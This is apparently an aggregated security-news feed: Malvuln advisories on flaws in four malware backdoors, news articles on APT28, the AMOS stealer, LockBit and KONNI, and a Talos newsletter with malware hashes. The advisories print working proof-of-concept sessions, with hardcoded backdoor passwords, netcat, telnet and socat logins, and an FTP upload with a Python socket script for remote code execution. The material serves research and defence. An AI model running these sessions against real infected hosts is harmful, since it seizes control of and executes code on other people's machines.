Backdoor.Win32.Agent.amt malware suffers from bypass and code execution vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2a442d3da88f721a786ff33179c664b7.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.amtVulnerability: Authentication BypassDescription: The malware can run an FTP server which listens on TCP port 2121. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders can then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: AgentType: PE32MD5: 2a442d3da88f721a786ff33179c664b7Vuln ID: MVID-2024-0673Disclosure: 02/28/2024 Exploit/PoC:C:\sec>nc64.exe 192.168.18.125 2121220 Welcome To mybr Ftp!USER gg331 Password required for gg.PASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP250 CWD command successful. "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,211,164).STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *import timeHOST = "192.168.18.125"PORT = 54180BUF_SIZE = 32s=socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT))with open("DOOM_SM.exe", "rb") as f:    while True:         bytez = f.read(BUF_SIZE)        if not bytez:            break        s.send(bytez)        time.sleep(0.5)print("By malvuln")s.close()1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\DOOM_SM.exe1/23/2024 9:09:54 PM - gg -  PASV C:\1/23/2024 9:09:44 PM - CD C:\1/23/2024 9:09:44 PM - gg -  CDUP C:\1/23/2024 9:09:18 PM - gg -  SYST C:\1/23/2024 9:09:15 PM - gg1/23/2024 9:09:15 PM - gg -  PASS C:\TEMP\hate1/23/2024 9:09:12 PM -  -  USER C:\TEMP\gg1/23/2024 9:09:06 PM -  -  Connected1/23/2024 9:08:58 PM - FTP StartedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.amt MVID-2024-0673 Authentication Bypass / Code Execution

Backdoor.Win32.Jeemp.c malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d6b192a4027c7d635499133ca6ce067f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Jeemp.cVulnerability: Cleartext Hardcoded CredentialsDescription: The malware listens on three TCP ports which are randomized e.g. 9719,7562,8687,8948,7376,8396 so forth. There is an ESMTP server component "jeem.mail.pv" requiring authentication for the GDATA, SDATA commands and sample is packed using UPX. However, it is trivial to unpack using the -d flag which reveals the cleartext hardcoded credentials "jeepower" and "jeespower" in the PE file.Family: JeempType: PE32MD5: d6b192a4027c7d635499133ca6ce067fVuln ID: MVID-2024-0672Dropped files: msrexe.exeDisclosure: 02/28/2024Exploit/PoC:TELNET x.x.x.x 7562220 jeem.mail.pv ESMTPHELO hate250 okGDATA250 okNeed passwordjeepower[prx]#######250 okSDATA250 okNeed passwordabc123!503 wrong!SDATA250 okNeed passwordjeespower250 okDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Jeemp.c MVID-2024-0672 Hardcoded Credential

A previously undocumented threat actor dubbed SPIKEDWINE has been observed targeting officials in European countries with Indian diplomatic missions using a new backdoor called WINELOADER.
The adversary, according to a report from Zscaler ThreatLabz, used a PDF file in emails that purported to come from the Ambassador of India, inviting diplomatic staff to a wine-tasting

New Backdoor Targeting European Officials Linked to Indian Diplomatic Events

By Deeba Ahmed
Russian hackers, part of Russia’s Main Intelligence Directorate of the General Staff, are using compromised Ubiquiti EdgeRouters to…
This is a post from HackRead.com Read the original post: FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation

Russian hackers, part of Russia’s Main Intelligence Directorate of the General Staff, are using compromised Ubiquiti EdgeRouters to build extensive botnets, steal credentials, collect NTLMv2 digests, and proxy malicious traffic.

The FBI, NSA, US Cyber Command, and international partners have released a joint Cybersecurity Advisory to caution against Russian state-sponsored cyber actors using compromised Ubiquiti EdgeRouters for malicious cyber operations. They have also used compromised routers for spoofed landing pages and post-exploitation tools.

As per the advisory (PDF), Russia-backed APT28 actors (aka Fancy Bear) have been using compromised Ubiquiti EdgeRouters since 2022 to carry out covert cyber operations against various industries, including Aerospace & Defense, Education, and Energy & Utilities. The Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, and the US are some of its key targets. 

In 2023, APT28 actors used Python scripts to collect webmail user credentials and uploaded them to compromised Ubiquiti routers via cross-site scripting and browser-in-the-browser spear-phishing campaigns. They also exploited the CVE-2023-23397 zero-day, despite being patched, to install tools like Impacket ntlmrelayx.py and Responder on compromised routers, allowing NTLM relay attacks and host rogue authentication servers.

For your information, Microsoft’s Threat Protection Intelligence team discovered this vulnerability in Outlook that allowed attackers to steal Net-NTLMv2 hashes and access user accounts. The vulnerability was previously exploited by the group Forest Blizzard, suspected to have affiliations with the Russian military intelligence agency.  

The FBI has identified IOCs for the Mirai-baed Moobot OpenSSH trojan and APT28 activity on EdgeRouters. APT28 actors exploit vulnerabilities in OpenSSH server processes, hosting Python scripts to collect and validate stolen webmail account credentials. The actors have used iptables rules on EdgeRouters to establish reverse proxy connections and upload adversary-controlled SSH RSA keys to compromised routers. They have also used masEPIE, a Python backdoor capable of executing arbitrary commands on victim machines.

Further probing revealed that APT28 used compromised Ubiquiti EdgeRouters as C2 infrastructure for MASEPIE backdoors deployed against targets. Data sent to and from the EdgeRouters was encrypted using a randomly generated 16-character AES key.

The FBI recommends remediating compromised EdgeRouters by performing a hardware factory reset, upgrading to the latest firmware, changing default usernames and passwords, and implementing strategic firewall rules on WAN-side interfaces.

Network owners should keep their operating systems, software, and firmware up-to-date, and update Microsoft Outlook to mitigate CVE-2023-23397. To mitigate other forms of NTLM relay, network owners should consider disabling NTLM or enabling server signing and Extended Protection for Authentication configurations.

****Experts Opinions:****

For insights into the latest advisory, we reached out to John Bambenek, President at Bambenek Consulting who emphasised on the importance of patching flaws and keeping the system up-to-date.

“The single biggest advance in cybersecurity across the technical stack in 25 years was when Microsoft made auto-updating the default setting in Windows. Across the IoT, embedded devices, and network stack, this is not the norm,” John argued.

“We know devices aren’t patched by consumers or most organizations so why wouldn’t nation-state actors get in on the target-rich environment? These devices have all the weaknesses of normal computers, just without the ability of the user to harden them, put EDR on them, or do anything we would to a server to make it safer. Until manufacturers treat this problem seriously, whether it’s Mirai or a spy, these devices will continue to be compromised in bulk.”

1.  **Hackers Steal $47 Million From American Tech Firm Ubiquiti**
2.  **US Military Satellite Access Sold on Russian Forum for $15K**
3.  **Russian Hackers Employ Telekopye Toolkit in Phishing Attacks**
4.  **Russian APT29 Hacked US Biomedical Giant in TeamCity Breach**
5.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**
6.  **Russian Hackers Hit European Mail Servers for Political, Military Intel**

FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation

By Waqas
macOS users watch out for the new variant aiming at your crypto funds!
This is a post from HackRead.com Read the original post: New Variant of AMOS Stealer Targets Safari Cookies and Crypto Wallets

The new Atomic variant uses Python and Apple Script code to target browser and system files, obtain user account passwords, and identify sandbox or emulator execution.

Bitdefender researchers have discovered a new variant of the AMOS Stealer (or Atomic Stealer), one of the most prevalent threats for macOS users in the last year. According to Bitdefender, the new variant was discovered while revisiting old or new malware samples to improve detection capabilities for macOS cyber-security products.

When researchers isolated several suspicious macOS disk image files, which were surprisingly small for their size (1.3 MB), they became suspicious of the emergence of a new variant of the AMOS Stealer.

Screenshot from VirusTotal (Bitdefender)

The new variant combines functionalities of numerous malware families, including information stealers, keyloggers, and cryptocurrency mining tools, allowing it to steal sensitive data while its advanced stealth makes it harder for users to identify/remove the infection.

Further probing revealed that this variant shares similarities with the second variant of RustDoor. “Both seem to focus on collecting sensitive files from the victim’s computer, with the current one being a more developed version of the script used by RustDoor,” researchers noted.

However, the new variant has additional features. It collects the Cookies.binarycookies file, which stores Safari browser cookies, obtains files with targeted extensions from specific locations and uses the system\_profiler utility to gather information about the compromised computer. 

The attackers aim to obtain hardware-related details, operating system versions and connected displays and graphic cards. They add sensitive information to the archive, including passwords, encryption keys, and certificates, indicating their growing interest in cryptocurrency platforms.

This version has an unusual technique of combining Python with Apple Scripting where the filegrabber() function executes a large block of Apple script using the osascript -e command. DMG files contain FAT binary and Mach-O files for Intel and ARM architectures, used by threat actors to steal data.

When opened, as noted by researchers in a blog post, the Crack Installer application prompts the user to open the file. The Python script collects sensitive data from multiple sources, including crypto-wallet extensions, browser data, and user account passwords.

The Chromium () function collects files from targeted Chromium-based browsers, including web data, login data, and cookies. It also targets cryptocurrency browser extensions and Mach-O binaries. The parseFF() function targets Firefox and collects files associated with all profiles.

Moreover, the script targets installed crypto wallets like Electrum, Coinomi, Exodus or Atomic. The collected data is stored in a ZIP archive, which is sent to a C2 server using a POST request. The archive structure is confirmed by the C2 server.

The variant is largely undetected at the moment. Bitdefender has released Indicators of Compromise to help organizations and practitioners detect and mitigate this threat.

1.  **BlueNoroff APT Targeting macOS with ObjCShellz Malware**
2.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
3.  **Cracked macOS Software Laced with New Trojan Proxy Malware**
4.  **New macOS Backdoor Steals Data, Linked to Ransomware Gangs**
5.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**

New Variant of AMOS Stealer Targets Safari Cookies and Crypto Wallets

By Waqas
LockBit ransomware gang relaunches operation after law enforcement hacked its servers, threatening to target government entities more now.
This is a post from HackRead.com Read the original post: LockBit Ransomware Gang Returns, Taunts FBI and Vows Data Leaks

Despite arrests, infrastructure seizure and international law enforcement efforts, LockBit ransomware has resurfaced, promising robust security and threatening aggressive cyber attacks on UK and USA government sectors.

The LockBit ransomware gang has officially announced its comeback through a detailed message posted on Saturday on its newly created .onion site on the dark web.

The leader of the **LockBit ransomware**, whose identity is still unknown to authorities, admitted negligence in letting the FBI and the UK’s National Crime Agency control its servers via a PHP attack but promised backups and continued operations.

The new dark web leak site of the ransomware gang is already live and adding new alleged companies as its victims (Screenshot credit: Hackread.com)

The announcement comes only a week after the group was neutralized in **Operation Cronos**, a multinational law enforcement investigation, reportedly neutralized the ransomware gang.

For your information, on 19 February 2024, **as reported by Hackread.com**, law enforcement authorities seized LockBit’s infrastructure, including 34 servers that hosted the gang’s data leak website storing stolen data, cryptocurrency addresses, decryption keys, and the affiliate panel causing a major setback to the notorious gang.

The message from the gang’s admin which directly addressed the FBI and the NCA, revealed that servers without PHP installed in backup blogs are unaffected and will continue to release stolen data from targeted companies, even after the FBI hack, and stolen data will be published on the LockBit blog.

The admin claims that Operation Cronos was successful because of their negligence and irresponsibility in “not updating PHP settings on their servers in good time.” They denied Operation Cronos investigators’ claims regarding arresting their two alleged affiliates, the gang donating to a Crimea-based Russian propagandist (Sevastapol Colonel Cassad), and recovering a high number of decryptors. 

However, LockBit confirmed the FBI’s claim that its annual income exceeds $100m, based on data from seized cryptocurrency wallets during Operation Cronos. The group has deleted chats containing evidence of **ransomware payments**, indicating that their revenues exceed US law enforcement estimates. This demonstrates their success despite making mistakes.

The admin wrote that their victim’s admin chat panels server and blog server were running PHP 8.1.2 and were likely hacked using the **CVE-2023-3824** vulnerability. LockBit ransomware has updated its PHP server and offering rewards for finding vulnerabilities in its latest version. LockBit has moved its data leak site to a new.onion address and has targeted five victims with countdown timers to expose the stolen data.

LockBit’s message to the FBI and the NCA – Open in a new tab for a clear view (Screenshot credit: Hackread.com)

Regarding why the FBI hacked their infrastructure, the gang stated that their ransomware attack on Fulton County in January irked the authorities for posing the risk of leaking information on **Donald Trump** court cases and other “interesting things.”

LockBit claims authorities collected over 1,000 decryption keys during Operation Cronos from “unprotected decryptors,” which they defined as low-level malware builds. LockBit plans to upgrade security, manually release decryptors, host affiliate panels on multiple servers, and provide partners with access to different copies.

****RELATED ARTICLES****

1.  **FIN8 Resurfaces with New Sardonic Backdoor**
2.  **Hive Ransomware Resurfaces as Hunters International**
3.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
4.  **Mirai botnet resurfaces with MooBot variant to target D-Link devices**
5.  **Nasty Mamba ransomware that encrypts entire hard drive resurfaces**

LockBit Ransomware Gang Returns, Taunts FBI and Vows Data Leaks

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

By Waqas
Friend or Foe?
This is a post from HackRead.com Read the original post: Russian Ministry Software Backdoored with North Korean KONNI Malware

Discover the latest cybersecurity revelation: KONNI malware, linked to North Korean cyber operations, targets the Russian Ministry of Foreign Affairs. Learn about the sophisticated tactics and geopolitical implications

German cybersecurity firm DCSO has discovered a malware sample uploaded to VirusTotal in January 2024, believed to be part of North Korea-linked activity targeting the Russian Ministry of Foreign Affairs (MID). The malware is believed to be **KONNI**, a North Korean nexus tool used since 2014.

KONNI, first **discovered in 2014**, is associated with the Democratic People’s Republic of Korea (DPRK)-nexus actors like Konni Group and TA406. The malware has unique stealer functionality and remote administration capability. It’s installed in an MSI file, with C2 servers encrypted with AES-CTR, and a CustomAction for detection and payload selection.

In the latest discovery, researchers noted that KONNI’s command set remains unchanged, allowing operators to execute commands, upload/download files, specify sleep intervals, communicate via HTTP, and compress file extensions into .CAB archives.

> #ShortAndMalicious  
> Our researchers recently discovered an installer for the mandatory 🇷🇺Russian tax filling software "Spravki BK" (Справки БК) which was backdoored with #KONNI malware, generally attributed to 🇰🇵North Korean threat actors. 1/5
> 
> — DCSO CyTec (@DCSO\_CyTec) October 17, 2023

Interestingly, the sample **DCSO analyzed** was delivered via a backdoored Russian language software installer, similar to a previously observed KONNI delivery technique. The sample was for a tool called “Statistika KZU”, which is believed to be intended for internal use within the Russian MID. The software is used for relaying annual report files from overseas consular posts to the MID’s Consular Department via a secure channel.

Additionally, two user manuals were found in the backdoored installer, detailing the installation and usage of the “Statistika KZU” program. The first manual explains installing the program on an administrative account, providing minimum software requirements and screenshots.

The second 22-pager manual, “StatRKZU\_Pyкoвoдcтвo,” outlines how to use the software for generating annual report files on KZU consular activities, including templates for calculating registered and detained citizens.

The MID’s software, identified as “GosNIIAS” (a Russian federal research institute primarily involved in aerospace research), was tested offline and found legitimate. Despite no direct correlations between GosNIIAS and Statistika KZU, references to contracts were found, including a procurement order for automated system maintenance and data protection software.

This discovery comes amid increasing geopolitical proximity between Russia and the DPRK, following Russia’s renewed invasion of Ukraine in 2022.

****Russia and North Korea’s Cyber Standoff****

This is not the first time Russia and North Korea have made collective headlines over cybersecurity threats. **In August 2023**, the world witnessed another significant incident when “elite North Korean hackers” affiliated with OpenCarrot and the Lazarus group breached NPO Mashinostroyeniya, a key Russian missile developer. This breach, lasting for at least five months, revealed the alarming capabilities and determination of the attackers.

****Previous Use of KONNI Backdoor****

KONNI has been used in many cyberespionage campaigns targeting Russian agencies. FortiGuard Labs discovered a KONNI malware campaign **in November 2023**, targeting Windows systems through Word documents with malicious macros. Malwarebytes researchers **discovered** a campaign in mid-2021 using Russian language lures concerning Russian-Korean trade and economic issues and a meeting of a Russian-Mongolian intergovernmental commission.

An unknown hacking group **targeted** North Korean organizations using KONNI Malware in 2017. Three campaigns were identified back then- two by Talos Intelligence, a Cisco-owned cybersecurity firm, and the third reported by Cylance security firm.

For insights into this, we reached out to John Bambenek, President at Bambenek Consulting, who emphasised that “It is not uncommon for intelligence agencies to spy even on their putative allies, if for nothing else, for insights to either strengthen the relationship or to identify and mitigate threats.”

Mr. Bambenek highlighted that “The use of a backdoor in software used almost exclusively by the Russian Foreign Ministry stands out and shows that the DPRK did their research here for a particular hook into their victims and is, ironically, a more targeted and precise adaptation of the approach Russian intelligence used with **NotPetya**.”

“Espionage has a couple of nuances where sometimes you want more sophisticated tools and for some attacks, you want narrow and simpler tools. For espionage, you want long-term persistent infection and sophisticated and interactive tools provide defenders more opportunities for detection. It’s not uncommon to see tools used for espionage that lack some of the obfuscation commonly observed in **cybercrime tools**,” he added.

****RELATED ARTICLES****

1.  **Gone: Russian Central Bank hacked; $31 million stolen**
2.  **2 Russian Industrial Firms Hacked, 112GB of Data Leaked**
3.  **Anonymous Leaks 128 GB of Data from Russian ISP Convex**
4.  **Elite North Korean Hackers Breach Russian Missile Developer**
5.  **Anonymous Hacks Central Bank of Russia; Leaks 28GB of Data**

Russian Ministry Software Backdoored with North Korean KONNI Malware

Backdoor.Win32.Armageddon.r malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Armageddon.rVulnerability: Hardcoded Cleartext CredentialsDescription: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1" then enter the password.Family: ArmageddonType: PE32 MD5: 68d135936512e88cc0704b90bb3839e0Vuln ID: MVID-2024-0670Dropped files: IP-logs.txtDisclosure: 02/22/2024Exploit/PoC:root@kali:/home/kali# socat - TCP4:x.x.x.x:58591  KOrUPtIzEre1  DESKTOP-2C4IJHO  VICTIM   WedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Armageddon.r MVID-2024-0670 Hardcoded Credential

Fake news, disinformation, misinformation – whatever label you want to put on it – will not just go away if one election in the U.S. goes one way or the other.

Thursday, February 22, 2024 14:00

When we talk about the term “fake news,” most people likely picture a certain person who made the term infamous. 

And when we talk about misinformation and disinformation, many will remember the “Russian troll farms” that popped up during the 2016 U.S. presidential election and were unmasked and shut down during former president Barack Obama’s final days in office. 

But a few recent actions from TikTok, the most popular online social media platform, show that the problem of spreading misinformation and disinformation goes far beyond the borders of the U.S. 

TikTok announced last week it was launching in-app “election centres” to help combat misinformation and inform users of facts when they view videos about elections in European Union nations. This includes 27 unique apps that all use the country’s native language.  

In a statement on their site, the social media company said this effort is to “ensure people can easily separate fact from fiction.” 

Part of me can’t help but wonder if this wasn’t a problem of the company’s own creation after they allowed misinformation about the COVID-19 global pandemic to spread rapidly and use an algorithm that enhances “controversial” videos about different international brands. But I can certainly hope that these election centres provide more context than the little info box Twitter launched a while ago.  

I think this is important to note, though, that this problem just goes beyond American culture. Fake news, disinformation, misinformation – whatever label you want to put on it – will not just go away if one election in the U.S. goes one way or the other. It is an issue that is spreading on all platforms in all countries. 

I’ve been at fault in the past for just wanting to put the blame on Twitter. While they have been one of the worst offenders of allowing misinformation on their site, they are far from the only offenders or the only platform where users can spread this time of misinformation, even if they are doing it by accident. 

Just like any other platform, it’s easy for someone on TikTok to simply “share” or “like” someone else’s video if they find it compelling without giving it a second thought. Your friends and family are likely spreading misinformation on their feeds without even knowing it or doing it with any malicious intent. Regardless of where you live in the world, this is likely true. 

It’s amplified in the U.S. because our political theater is such that when something happens, everyone else on the world stage notices it. I can’t say that folks in the U.S. are necessarily invested in the national elections in Greece.  

But if misinformation is allowed to spread during the Greek elections, it’s going to spread to U.S. presidential elections. Once the infrastructure is in place for disinformation to flourish on a platform, it’s nearly impossible to get rid of, no matter the topic.  

**The one big thing **

Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe. The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly observe new email distribution campaigns. We have observed all three malware families being delivered during the same timeframe from the same storage bucket within Google Cloud. 

**Why do I care? **

Some of the highest volume campaigns recently observed were being used to deliver the Astaroth, Mekotio, and Ousaban banking trojans to victims largely located in Latin American countries. We have also observed lower volume campaign victims located throughout Europe and North America, which may indicate less geographically focused targeting by threat actors moving forward. For example, the current variant of Astaroth targets more than 300 institutions across 15 Latin American countries. 

**So now what? **

Talos has released new ClamAV signatures and Snort rules to protect against these various banking trojans. Our researchers have also alerted Google of this activity so that they may address it internally on Cloud Run. 

**Top security headlines of the week **

**Poland is launching a formal investigation into whether its former government leaders misused the Pegasus spyware.** Parliament created a coalition to see if the Law and Justice (PiS) government, previously the ruling party of Poland, used the controversial spyware to track and target its political opponents. Current ruling leaders used a promise of an investigation as one of their top campaign platforms. Meanwhile, NSO Group, the creators of Pegasus, have reportedly created a new one-click exploit called “MMS Fingerprint” that it offers as an infection tool for the spyware. MMS Fingerprint allows Pegasus users to learn a great deal about a target Blackberry, iPhone or Android device by sending a specially crafted Multimedia Messaging Service (MMS) message. A contract between an NSO Group reseller and a customer in Ghana exposed the information, including a promise that MMS Fingerprint required “No user interaction, engagement, or message opening ... to receive the device fingerprint.” (Politico, DarkReading) 

**The spyware startup Variston is reportedly shrinking and is preparing to completely close.** Variston is known for launching spyware that can target iPhones, Android devices and some PCs. A disgruntled employee reportedly leaked information about the company and the zero-day exploits they used to Google’s Threat Analysis Group, which allowed Google to unmask the operation. This eventually led to several employees and developers leaving Variston. Variston, founded in 2018, previously used three zero-day vulnerabilities to target Apple devices, including a campaign in March 2023 to target iPhones in Indonesia. Reporters and researchers have yet to find who, exactly, Variston sold their services and technology to, though former employees have said some of the spyware was sent to the United Arab Emirates. (Tech Crunch, Google) 

**Volt Typhoon, a large APT based in China, is reportedly still exfiltrating sensitive information on operational technology (OT) networks.** Volt Typhoon has been known to target organizations in the communications, manufacturing, utility, IT and education sectors across the globe, though it’s recently become more noteworthy for its targeting of critical networks in the U.S. A new report from cybersecurity firm Dragos says that it spotted Volt Typhoon conducting scanning activities against electric companies between November and December 2023. Volt Typhoon is traditionally known for espionage and data theft on behalf of the Chinese government. But Dragos also says that the actor has also recently infiltrated a large U.S. city's emergency services network, as well as critical infrastructure networks in Africa. The report states that the OT data stolen may cause “unintended disruption to critical industrial processes or provide the adversary with crucial intelligence to aid in follow-up offensive tool development or attacks against ICS networks.” (SecurityWeek, The Register) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #172: Case study: How Talos IR helped a healthcare tech company avoid a ransomware attack 
*   How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity 
*   Network infrastructure was a prime target for cyber threats in 2023 
*   Russian APT Turla Wields Novel Backdoor Malware Against Polish NGOs 
*   Turla hackers backdoor NGOs with new TinyTurla-NG malware 

**Upcoming events where you can find Talos **

**S4x24** **(March 4 - 27)** 

Miami Beach, Florida 

_To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine._ 

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** 6d167aee7013d61b0832937773cd71d77493a05d6ffb1849bdfb1477622e54c2   
**MD5:** 36503fd339663027f5909793ea49ccbc   
**Typical Filename:** telivy\_agent\_2.3.1.exe   
**Claimed Product:** N/A    
**Detection Name:** W32.File.MalParent

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1      
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515      
**Typical Filename:** IMG001.exe      
**Claimed Product:** N/A      
**Detection Name:** Win.Dropper.Coinminer::1201 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

Tag

#backdoor